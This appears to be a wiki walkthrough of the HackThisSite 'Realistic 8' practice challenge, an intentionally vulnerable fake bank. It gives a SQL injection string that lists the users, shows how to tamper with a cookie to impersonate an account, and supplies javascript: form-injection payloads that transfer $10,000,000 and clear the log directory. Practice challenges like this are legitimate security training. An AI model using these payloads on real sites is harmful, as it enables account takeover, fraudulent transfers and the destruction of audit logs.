From aldeid
Jump to navigation Jump to search
  • Level: Realistic::8 (United Banks Of America)
  • URL: http://www.hackthissite.org/missions/realistic/8/
  • Difficulty :
  • Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?

Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:

  1. Find the account of Gary Hunter (I don't know his account name).
  2. Move the $10,000,000 into the account dropCash.
  3. Clear The Logs, They're held in the folder 'logFiles'.

I really hope you can do this, because if you can't we're all screwed

  • Solution:


From the navigation and source code of pages, we gather following information:

Description Page Fields
Register pages Register.php > register2.php
  • <input type="text" name="username" maxlength=10>
  • <input type="password" name="password" maxlength=50>
  • <textarea name="desc" rows=5 cols=20 maxlength=255>
Login pages login1.php > login2.php
  • <input type="text" name="username" value="Enter Username">
  • <input type="password" name="Password" value="">
Purge files cleardir.php <input type='hidden' name='dir' value='loginSQLFiles'>
Transfer money from one account to another movemoney.php
  • <input type='text' name='TO' value='Username To Give Money To'>
  • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Garry Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ' or 'a'='a.

By scrolling down, we find:

GaryWilliamHunter : -- $$$$$ --

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (-- $$$$$ --)

Objective 2: Move the $10,000,000 into the account dropCash

By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.


Install Firebug and Firecookie for Firefox. We then have to change value of cookie named "accountUsername" to "GaryWilliamHunter" and use following JS injection (copy/paste in the URL):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It will dynamically write a form on the page, containing necessary values for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

By validating the form, it will complete the stage.

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste following code in the URL:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))